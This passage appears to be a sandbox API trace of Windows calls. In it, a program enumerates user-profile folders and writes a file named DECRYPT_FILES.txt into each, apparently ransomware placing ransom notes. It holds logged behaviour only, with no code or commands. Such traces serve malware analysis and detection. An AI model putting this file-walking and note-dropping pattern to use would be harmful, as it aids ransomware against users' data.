nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0055.127] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0055.127] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0055.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0055.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0055.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x3b [0055.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee620) returned 1 [0055.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0055.128] GetFileType (hFile=0x408) returned 0x1 [0055.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee590) returned 1 [0055.128] GetFileType (hFile=0x408) returned 0x1 [0055.128] WriteFile (in: hFile=0x408, lpBuffer=0x2207e90*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0ee668, lpOverlapped=0x0 | out: lpBuffer=0x2207e90*, lpNumberOfBytesWritten=0x1c0ee668*=0x9d5, lpOverlapped=0x0) returned 1 [0055.139] CloseHandle (hObject=0x408) returned 1 [0055.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0055.147] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpFilePart=0x0) returned 0x26 [0055.148] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpFilePart=0x0) returned 0x27 [0055.309] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0055.608] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.612] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0055.617] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0055.621] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0055.621] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0055.621] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0055.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0055.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0055.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0055.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpFilePart=0x0) returned 0x26 [0055.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpFilePart=0x0) returned 0x27 [0055.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0055.622] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.622] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0055.622] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0055.622] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0055.622] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0055.623] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0055.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0055.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0055.623] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x38 [0055.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee620) returned 1 [0055.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0055.624] GetFileType (hFile=0x408) returned 0x1 [0055.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee590) returned 1 [0055.624] GetFileType (hFile=0x408) returned 0x1 [0055.624] WriteFile (in: hFile=0x408, lpBuffer=0x220c730*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0ee668, lpOverlapped=0x0 | out: lpBuffer=0x220c730*, lpNumberOfBytesWritten=0x1c0ee668*=0x9d5, lpOverlapped=0x0) returned 1 [0055.625] CloseHandle (hObject=0x408) returned 1 [0055.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0055.625] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", lpFilePart=0x0) returned 0x24 [0055.625] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpFilePart=0x0) returned 0x25 [0055.626] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0055.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5e0) returned 1 [0055.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0055.628] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", lpFilePart=0x0) returned 0x28 [0055.628] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpFilePart=0x0) returned 0x29 [0055.628] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0055.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5e0) returned 1 [0055.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0055.631] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", lpFilePart=0x0) returned 0x27 [0055.631] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpFilePart=0x0) returned 0x28 [0055.631] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0055.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5e0) returned 1 [0055.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0055.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpFilePart=0x0) returned 0x23 [0055.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpFilePart=0x0) returned 0x24 [0055.633] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0055.633] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.634] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0055.634] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0055.634] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0055.634] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0055.634] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0055.634] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0055.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0055.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0055.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0055.634] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpFilePart=0x0) returned 0x23 [0055.634] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpFilePart=0x0) returned 0x24 [0055.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0055.635] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.635] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0055.635] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0055.635] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0055.635] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0055.636] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0055.636] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0055.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0055.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0055.636] GetFullPathNameW (in: 